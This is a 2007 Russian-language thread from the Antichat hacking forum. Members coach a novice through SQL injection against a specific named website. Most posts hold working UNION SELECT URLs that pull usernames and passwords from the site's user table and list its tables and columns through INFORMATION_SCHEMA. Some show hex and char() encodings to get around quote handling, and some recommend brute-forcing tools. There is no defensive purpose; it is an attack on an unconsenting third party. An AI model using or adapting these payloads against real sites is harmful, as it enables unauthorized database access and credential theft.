Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL-inj (https://forum.antichat.xyz/showthread.php?t=47071)

Qwertison 19.08.2007 16:15
SQL-inj
 
Вот SQL-inj
Код:
http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?

Basurman 19.08.2007 16:46
А там нет скули. Поищи другие скрипты

Qwertison 19.08.2007 16:48
Всмысле, ошибка же есть?

Ksander 19.08.2007 17:18
Там не смотрел, но вот тут она точно есть

Код:
хттп://mir-tech.ru/group.php?cat=-1+union+select+version()/*
Цитата:
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(name,0x3a,password)+from+mai n_users/*

Qwertison 20.08.2007 13:33
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?

phol1eadeux 20.08.2007 13:46
Цитата:
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Можно вручную, либо специализированными программами-брутерами

Qwertison 20.08.2007 13:48
Какими например, я таких не видел.

phol1eadeux 20.08.2007 13:55
SQL Bruter - одна из них

Ksander 20.08.2007 14:02
Цитата:
Сообщение от Qwertison
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?

Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:

Код:
union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 0,1/*
А потом колонки в интересующей нас табле:

Код:
union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*

ENFIX 20.08.2007 14:24
Цитата:
Сообщение от Ksander
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:

Код:
union select TABLE_NAME from INFORMATION.SCHEMA_TABLES limit 0,1/*
А потом колонки в интересующей нас табле:

Код:
union select COLUMN_NAME from INFORMATION.SCHEMA_COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS

Ksander 20.08.2007 14:34
Цитата:
Сообщение от ENFIX
Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
опечатался =)

Qwertison 20.08.2007 14:50
Уже надеялся что все.. Смотрю название таблы - http://mir-tech.ru/group.php?cat=-1+union+select+TABLE_NAME+fron+INFORMATION_SCHEMA. TABLES limit 0,1/*
Называется CHARACTER_SETS.
Ищу колумн -_http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME='CHARACTER_SETS' limit 0,1/* - не пашет???

Spyder 20.08.2007 21:09
Цитата:
Ищу колумн -_http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME='CHARACTER_SETS' limit 0,1/* - не пашет???
http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=0x4348415241435445525f53 455453 limit 0,1/*

delay(0) 20.08.2007 21:54
Можно и так,
Цитата:
http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=char(67,72,65,82,65,67,8 4,69,82,95,83,69,84,83)+limit+2,1/*

Taylorith 20.08.2007 22:48
Qwertison
у тя с головой все ок???
я втеме ваши уячзвимости написал тчо икак .... меня бесят такие люди.. тока флудить могут какого зхрена ты создаешь тему клоН?????? ваще чтоли даун... больше слов нет

Серенький 21.08.2007 00:44
для подбора таблиц и много для чего -
SQl Injection tool, советую


Время: 18:04